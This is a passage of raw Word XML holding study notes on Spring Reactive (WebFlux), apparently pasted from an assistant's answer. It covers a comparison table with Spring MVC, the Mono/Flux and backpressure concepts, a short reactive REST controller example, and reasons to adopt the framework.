          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the Spring Reactive framework?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="497"/>
    </w:p>
    <w:p w14:paraId="50948CA6" w14:textId="19E2542D" w:rsidR="00484F17" w:rsidRPr="00624104" w:rsidRDefault="00484F17" w:rsidP="00624104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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pring Reactive Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (part of </w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) is a framework introduced in </w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring 5</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to build </w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking</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asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, an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applications that can </w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>handle a large number of concurrent connections</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with fewer resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE49DEF"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E4F9D">
          <v:rect id="_x0000_i2192" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="768BCDA9"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596"/>
        <w:gridCol w:w="2983"/>
      </w:tblGrid>
      <w:tr w:rsidR="00624104" w:rsidRPr="00624104" w14:paraId="48D139B2" w14:textId="77777777" w:rsidTr="00484F17">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C5DC5B3"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6476673A"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MVC (Traditional)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D62F802"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WebFlux (Reactive)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00624104" w:rsidRPr="00624104" w14:paraId="471E0B18" w14:textId="77777777" w:rsidTr="00484F17">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D9F3AC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rogramming Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="009DD6D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Blocking (Servlet-based)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42475F4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Non-blocking (Reactive Streams)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00624104" w:rsidRPr="00624104" w14:paraId="5EDC0BC7" w14:textId="77777777" w:rsidTr="00484F17">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="669C6BC9"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oncurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19DFF69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One thread per request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40036F9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Event loop (fewer threads)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00624104" w:rsidRPr="00624104" w14:paraId="26999C0F" w14:textId="77777777" w:rsidTr="00484F17">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3ABCC60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erformance under Load</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7705FA9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an degrade with more load</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B6B835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cales well under heavy load</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00624104" w:rsidRPr="00624104" w14:paraId="2A381476" w14:textId="77777777" w:rsidTr="00484F17">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E04B8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API Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46372EE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ervlet API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E0ED617"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active Streams API</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4475C01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11DD7">
          <v:rect id="_x0000_i2193" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74582326"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Core Concepts in Spring Reactive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74496A5A"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Mono</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Emits 0 or 1 item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F82012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Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Emits 0 to N items</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7972CB6B"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Publisher</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Reactive Streams) → Produces data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F2C60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ubscriber</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Consumes data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A4B61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Backpressure</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Controls data flow to avoid overloading consumers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E97FB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7298D9">
          <v:rect id="_x0000_i2194" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D6867F"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Example: Reactive REST API using Mono</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F2945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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D30F3F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ublic class UserController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0D27D3" w14:textId="77777777" w:rsidR="00484F17" w:rsidRPr="00624104" w:rsidRDefault="00484F17" w:rsidP="00624104">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05BD873F"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GetMapping("/user/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FA3B3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public Mono&lt;User&gt; getUser(@PathVariable String id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BE0006"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return userService.getUserById(id); // returns Mono&lt;User&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6813C09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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D1507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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710850EC"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E8B36">
          <v:rect id="_x0000_i2195" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67156551"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ech Stack Compatibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADCD0B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orks with </w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Netty</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (default), </w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Servlet 3.1+</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Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44407CE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Can use with </w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>R2DBC</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for reactive DB access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7903D9F7"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F49F1">
          <v:rect id="_x0000_i2196" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CDE034"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When to Use Spring Reactive?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1EEDF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hen your application needs </w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high concurrency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399B72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 want to buil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microservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9493F0"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re using </w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>streaming data</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WebSockets</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive DBs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFC2D9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Let me know if you want a working sample or compare WebFlux with traditional Spring MVC in code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFF0A4F"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97" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3B3577" w14:textId="77777777"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98" w:name="_Toc197867712"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Why should we use Spring reactive?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="498"/>
    </w:p>
    <w:p w14:paraId="25747CD1" w14:textId="25E9BE10" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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We use </w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Reactive (Spring WebFlux)</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to build </w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scalable, efficient, and resilient</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> applications that handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with minimal resource consumption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E523C3"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696AB">
          <v:rect id="_x0000_i2198" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7199AE6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y Use Spring Reactive?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC498F6"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1. Non-blocking I/O</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242CD7D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It doesn't block threads while waiting for data (e.g., DB, API response).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6760BE46"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hreads stay free to serve other requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0570709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Example: While waiting for DB response, the same thread can serve other requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459C905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3F25AA">
          <v:rect id="_x0000_i2199" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="225B70D8"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lastRenderedPageBreak/>
        <w:t>2. Handles High Load with Fewer Threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2904CA4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an </w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-loop model</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like Node.js).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D044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Efficient under </w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>massive concurrent connections</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., thousands of users).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD667B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94DB3A">
          <v:rect id="_x0000_i2200" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B56DBD5"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3. Better Performance and Resource Utilization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3C653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More responsive under load compared to traditional (blocking) apps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E043CCE"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Uses less memory and CPU.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039DA9C5"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0C46">
          <v:rect id="_x0000_i2201" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="528692A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4. Backpressure Support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB4F154"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w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to control the data flow rate between producers and consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9AE322"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2A8DB">
          <v:rect id="_x0000_i2202" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70084AFE"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5. Streaming &amp; Real-time Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0931E298"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Ideal for </w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>live data</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hat app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tock ticker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IoT</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CE9F7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Supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebSocket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erver-Sent Events (SS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RSocket</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C92FB6"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14A1B6">
          <v:rect id="_x0000_i2203" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3846E3"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6. Reactive Databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D045047"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Compatible with </w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>R2DBC</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Mongo Reactiv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assandra Reactive</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
